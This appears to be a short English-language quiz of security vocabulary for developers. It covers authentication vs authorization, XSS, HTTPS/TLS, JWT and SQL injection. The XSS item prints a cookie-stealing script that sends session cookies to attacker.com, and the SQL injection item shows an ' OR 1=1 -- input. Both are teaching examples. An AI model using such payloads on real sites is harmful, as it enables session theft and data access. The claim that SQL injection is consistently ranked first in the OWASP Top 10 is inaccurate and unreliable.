5 exercises — core security terms: authentication vs authorization, XSS, HTTPS/TLS, JWT, and SQL injection. Covers the most common topics in security discussions and developer interviews.
Attacks (OWASP Top 10): SQL injection · XSS · CSRF · SSRF · broken access control · insecure deserialization
Transport: TLS · HTTPS · certificate · CA · cipher suite · HSTS · mTLS
Access control: RBAC · ABAC · principle of least privilege · zero trust · secret management
1 / 5
What is the difference between authentication and authorization?
Authentication (AuthN) answers: "Who are you?" — verifying identity via password, token, biometric, or certificate. Authorization (AuthZ) answers: "What are you allowed to do?" — checking permissions after identity is confirmed. Classic mnemonic: AutheNtication = ideNtity. Real example: you log in (authentication), but you can only read data, not delete it (authorization). Common protocols: OAuth 2.0 (authorization framework), OIDC — OpenID Connect (authentication layer on top of OAuth), SAML (enterprise SSO), JWT (token format used in both). This distinction is one of the most common interview questions in security and backend roles.
2 / 5
A Cross-Site Scripting (XSS) attack works by:
XSS (Cross-Site Scripting) injects malicious JavaScript into a web page that other users then execute. Example: a comment field that stores <script>document.location='http://attacker.com/steal?c='+document.cookie</script> — when another user views the page, their browser runs the script and their session cookie is stolen. Prevention: output encoding (HTML-encode all user-supplied content before rendering), Content Security Policy (CSP) header (restricts which scripts can run), framework-level escaping (React, Angular auto-escape by default). The other options describe: A = CSRF, B = SQL injection, D = Man-in-the-middle attack.
3 / 5
What is HTTPS and what does it protect against?
HTTPS = HTTP over TLS (Transport Layer Security). It provides: ① Encryption — data in transit cannot be read by a third party (confidentiality); ② Integrity — data cannot be modified in transit without detection; ③ Authentication — the TLS certificate confirms you're talking to the real server, not an impersonator. TLS uses asymmetric cryptography for key exchange, then symmetric encryption (AES) for the session. Key terms: certificate, CA (Certificate Authority), certificate chain, SNI (Server Name Indication), TLS handshake, cipher suite. HTTP Strict Transport Security (HSTS) forces browsers to always use HTTPS for a domain.
4 / 5
Complete with the correct security term: "The API validates the JWT on every request. If the token is expired or the _____ doesn't match, the request is rejected with a 401."
A JWT (JSON Web Token) has three Base64-encoded parts separated by dots: header.payload.signature. The signature is created by signing the header + payload with a secret key (HMAC) or private key (RSA/ECDSA). If someone tampers with the payload (e.g. changes "role":"user" to "role":"admin"), the signature no longer matches and the token is rejected. This is what makes JWTs tamper-evident. Important: JWTs are signed, not encrypted by default — anyone can read the payload. Never store sensitive data in a JWT unless you also encrypt it (JWE). Where revocation before expiry is required, consider opaque tokens plus token introspection instead.
5 / 5
What is SQL injection and how is it prevented?
SQL injection occurs when user input is directly concatenated into SQL queries. Example: query = "SELECT * FROM users WHERE name = '" + username + "'" — if username is ' OR 1=1 --, the query returns all users. Prevention: ① Parameterized queries / prepared statements — the SQL template and the user data are sent separately; the DB never interprets user data as SQL. ② ORMs — usually handle this automatically. ③ Input validation — defence in depth, not a primary fix. SQL injection is consistently ranked #1 in the OWASP Top 10 (Injection category). The same principle applies to NoSQL injection, LDAP injection, and command injection.